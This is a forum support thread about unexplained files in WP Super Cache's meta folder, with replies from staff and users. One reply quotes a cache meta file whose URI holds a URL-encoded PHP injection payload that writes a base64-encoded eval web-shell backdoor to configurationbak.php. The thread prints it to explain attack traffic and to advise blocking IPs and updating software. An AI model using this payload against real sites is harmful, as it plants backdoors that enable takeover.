Ben,
Thanks for the report. When the files are gone, that may mean the cache plugin cleared the folder they were in. I haven’t used WP Super Cache much, so I’m not sure of the details.
We have a guide for cleaning hacked sites here, which may help you find where the attackers are getting in, in order to drop those files:
How to clean a hacked website
There are also recommendations to help prevent it in the future, near the end of the page. Sometimes, if you have multiple sites on the same hosting account, there may also be a vulnerability in the other site(s), that can infect the others.
-Matt R
@ben:
Probably no need to panic. WP Super Cache creates meta files of cached pages in the /wp-content/cache/{blogs/BLOG_ADDRESS_IF_MULTISITE/}meta/ folder.
This is a sample meta file:
<?php die(); ?>{"headers":{"Content-Encoding":"Content-Encoding: gzip","Vary":"Vary: Accept-Encoding, Cookie","Expires":"Expires: Thu, 19 Nov 1981 08:52:00 GMT","Content-Type":"Content-Type: text\/html; charset=UTF-8","Cache-Control":"Cache-Control: no-store, no-cache, must-revalidate","Pragma":"Pragma: no-cache","Last-Modified":"Last-Modified: Wed, 18 May 2016 11:29:25 GMT"},"uri":"domain.tld\/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27%2Fconfigurationbak.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B",...}
There’s base64_decode
in the above, but that is only because someone is making these URI requests, with the malicious query string.
The cache (and corresponding meta files) are temporary, so they are deleted when no longer needed (mostly based on your settings in WP Super Cache).
Find the IPs of the requester in WF live activity and block it (preferably permanently), and make sure to keep core, plugins and themes up to date.
Happy surfing 🙂
Hey, thanks @n Atta Kusi Adusei – nice advice to block the IP… one note for folks, since I had forgotten this – once you block the IP in ‘Live Traffic’, you switch over to ‘Blocked IPs’ to make it permanent.